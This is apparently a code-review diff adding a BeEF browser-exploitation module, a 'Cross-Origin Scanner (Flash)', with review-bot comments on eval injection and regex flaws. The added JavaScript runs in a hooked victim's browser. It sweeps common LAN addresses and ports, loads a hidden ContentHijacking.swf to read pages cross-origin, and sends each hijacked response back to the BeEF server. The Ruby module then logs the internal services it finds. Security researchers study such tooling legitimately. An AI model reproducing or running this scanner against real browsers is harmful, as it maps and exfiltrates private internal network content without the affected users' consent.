'192.168.1.100', + '192.168.1.254', + '10.0.0.1', + '10.1.1.1', + '192.168.2.1', + '192.168.2.254', + '192.168.100.1', + '192.168.100.254', + '192.168.123.1', + '192.168.123.254', + '192.168.10.1', + '192.168.10.254' + ]; + } else { + // set target IP range + var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); + if (range == null || range[1] == null) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error()); + return; + } + // ipRange will be in the form of 192.168.0.1-192.168.0.254 + // the fourth octet will be iterated. 
+ // (only C class IP ranges are supported atm) + ipBounds = ipRange.split('-'); + lowerBound = ipBounds[0].split('.')[3]; + upperBound = ipBounds[1].split('.')[3]; + for (var i = lowerBound; i <= upperBound; i++){ + ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i; + ips.push(ipToTest); + } + } + + WorkerQueue = function(frequency) { + + var stack = []; + var timer = null; + var frequency = frequency; + var start_scan = (new Date).getTime(); + + this.process = function() { + var item = stack.shift(); + eval(item); + if (stack.length === 0) { + clearInterval(timer); + timer = null; + var interval = (new Date).getTime() - start_scan; + beef.debug("[Cross-Origin Scanner (Flash)] Worker queue is complete ["+interval+" ms]"); + return; + } + } + + this.queue = function(item) { + stack.push(item); + if (timer === null) { + timer = setInterval(this.process, frequency); + } + } + + } + + var init = function(id, port) { + var newObjectTag; + var attr = {}, param = {}; + var url = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf'; + attr = {id: 'cross_origin_flash_<%= @command_id %>_'+id+'_'+port, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'}; + param = {'AllowScriptAccess': 'always'}; + attr.data = url; + newObjectTag = createHTMLObject(attr,param); + beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the new object..."); + document.body.appendChild(newObjectTag); + }; + + // create and embed Flash object + var createHTMLObject = function(attributes, parameters) { + var i, html, div, obj, attr = attributes || {}, param = parameters || {}; + html = ''; + html += ''; + div = document.createElement('div'); + div.innerHTML = html; + obj = div.firstChild; + div.removeChild(obj); + return obj; + }; + + // fetch a URL with Flash + var get_url = function(proto, host, port, id) { + var objCaller; + var url = 
'http://'+host+':'+port+'/'; + beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url); + objCaller = document.getElementById('cross_origin_flash_<%= @command_id %>_'+id+'_'+port); + try { + objCaller.GETURL('function(data) { '+ + 'var proto = "http";' + + 'var host = "'+host+'";' + + 'var port = "'+port+'";' + + 'var data = unescape(data);' + + 'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' + + 'if (!data.match("Hijacked Contents:")) return;' + + 'var response = data.replace(/^Hijacked Contents:\\r\\n/);' + + 'var title = "";' + + 'if (response.match("(.*?)<\\/title>")) {' + + ' title = response.match("<title>(.*?)<\\/title>")[1];' + + '}' + + 'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + ' }', url); + } catch(e) { + beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message); + } + setTimeout('document.body.removeChild(document.getElementById("cross_origin_flash_<%= @command_id %>_'+id+'_'+port+'"));', timeout); + } + + beef.debug("[Cross-Origin Scanner (Flash)] Starting scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)"); + + // create worker queue + var workers = new Array(); + for (w=0; w < threads; w++) { + workers.push(new WorkerQueue(wait*1000)); + } + + // send Flash request to each IP + var proto = 'http'; + for (var i=0; i < ips.length; i++) { + var worker = workers[i % threads]; + for (var p=0; p < ports.length; p++) { + var host = ips[i]; + var port = ports[p]; + worker.queue("init("+i+", "+port+"); setTimeout(function() {get_url('"+proto+"', '"+host+"', '"+port+"', "+i+");}, 2000)"); + } + } + +}); + diff --git a/modules/network/cross_origin_scanner_flash/config.yaml b/modules/network/cross_origin_scanner_flash/config.yaml new file mode 100644 index 000000000..4dc49c978 
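Review bot: `WorkerQueue.process` passes every queued item to `eval`, and those items are source strings concatenated from `host` and `port`; `port` comes straight from `ports.split(',')` with no numeric check, so a malformed option value ends up as script text evaluated in the page. `get_url` builds its callback source and the `setTimeout` string by the same concatenation. Queueing function objects and calling `item()` removes the string evaluation from the queue, as sketched below. The callback handed to `GETURL` may have to remain a string, in which case each port should be reduced to an integer first (`parseInt(ports[p], 10)`, rejecting non-numeric entries).

```javascript
// in WorkerQueue.process: items are functions, not source strings
var item = stack.shift();
item();
// … unchanged: timer teardown and debug output …

// one job per (id, host, port); the closure keeps its own copies
var makeJob = function(id, host, port) {
  return function() {
    init(id, port);
    setTimeout(function() { get_url(proto, host, port, id); }, 2000);
  };
};

// … unchanged: worker creation and the ips/ports loops …
worker.queue(makeJob(i, host, port));
```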
--- /dev/null
+++ b/modules/network/cross_origin_scanner_flash/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ cross_origin_scanner_flash:
+ enable: true
+ category: "Network"
+ name: "Cross-Origin Scanner (Flash)"
+ description: "Scan an IP range for web servers which allow cross-origin requests using Flash. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses.<br/><br/>This module uses ContentHijacking.swf from <a href='https://github.com/nccgroup/CrossSiteContentHijacking'>CrossSiteContentHijacking</a> by Soroush Dalili (@irsdl)."
+ authors: ["bcoles", "@irsdl"]
+ target:
+ working: ["C", "FF"]
+ not_working: ["IE", "S", "O"]
diff --git a/modules/network/cross_origin_scanner_flash/module.rb b/modules/network/cross_origin_scanner_flash/module.rb
new file mode 100644
index 000000000..2f610f63b
--- /dev/null
+++ b/modules/network/cross_origin_scanner_flash/module.rb
@@ -0,0 +1,46 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Cross_origin_scanner_flash < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/cross_origin_scanner_flash/ContentHijacking.swf','/objects/ContentHijacking','swf')
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+
+ # log the network service
+ if @datastore['results'] =~ /proto=(.+)&ip=(.+)&port=([\d]+)&title/
+ proto = $1
+ ip = $2
+ port = $3
+ type = 'HTTP Server (Flash)'
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found HTTP server #{ip}:#{port}")
+ BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type)
+ end
+ end
+ end
+
+ end
+
+ def self.options
+ return [
+ {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
+ {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'},
+ {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'},
+ {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'}
+ ]
+ end
+
+end
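Review bot: The pattern in `post_execute`, `/proto=(.+)&ip=(.+)&port=([\d]+)&title/`, is unanchored and greedy, and it is applied to `@datastore['results']`, which per command.js is a string sent by the hooked browser that ends with the fetched page's title and body. If that trailing text contains another `&ip=…&port=…&title` sequence, the greedy groups capture from it rather than from the leading fields, and `proto` is stored unchecked; only `ip` goes through `BeEF::Filters.is_valid_ip?`. Anchoring and narrowing the groups keeps the `NetworkService` record tied to the leading fields: `if @datastore['results'] =~ /\Aproto=(https?)&ip=([\d.]+)&port=(\d{1,5})&title=/`. Separately, `content['result']` reads the key `result` while the match reads `results`; it is worth confirming that both keys are populated as intended.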